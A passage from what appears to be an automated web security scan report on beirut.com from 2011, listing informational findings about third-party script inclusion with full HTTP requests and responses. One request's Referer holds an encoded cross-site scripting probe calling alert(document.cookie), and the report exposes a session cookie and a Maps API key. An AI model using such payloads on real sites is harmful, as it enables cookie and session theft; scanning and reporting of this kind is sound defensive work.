Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:41:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.571. http://www.beirut.com/Hotels/3-Stars/3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Hotels/3-Stars/3

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Hotels/3-Stars/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:43:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.572. http://www.beirut.com/Hotels/4-Stars/4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Hotels/4-Stars/4

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Hotels/4-Stars/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:44:17 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.573. http://www.beirut.com/Hotels/5-Stars/5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Hotels/5-Stars/5

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Hotels/5-Stars/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:46:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.574. http://www.beirut.com/Index/Error previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Index/Error

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Index/Error HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:13:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 62547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.575. http://www.beirut.com/JustForKids/Educational/9-service previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/JustForKids/Educational/9-service

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /JustForKids/Educational/9-service HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:58:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.576. http://www.beirut.com/JustForKids/Gatherings/14-event previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/JustForKids/Gatherings/14-event

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /JustForKids/Gatherings/14-event HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:23:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.577. http://www.beirut.com/JustForKids/Recreation-and-Fun/11-locale previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/JustForKids/Recreation-and-Fun/11-locale

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /JustForKids/Recreation-and-Fun/11-locale HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:29:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.578. http://www.beirut.com/JustForKids/Shops/8-locale previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/JustForKids/Shops/8-locale

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /JustForKids/Shops/8-locale HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:29:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.579. http://www.beirut.com/JustForKids/Sports/1-event previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/JustForKids/Sports/1-event

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /JustForKids/Sports/1-event HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:31:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.580. http://www.beirut.com/Loans previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Loans

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Loans HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:39:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.581. http://www.beirut.com/Movie-Theaters/5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Movie-Theaters/5

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Movie-Theaters/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:26:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.582. http://www.beirut.com/Movies previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Movies

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Movies HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:43:02 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
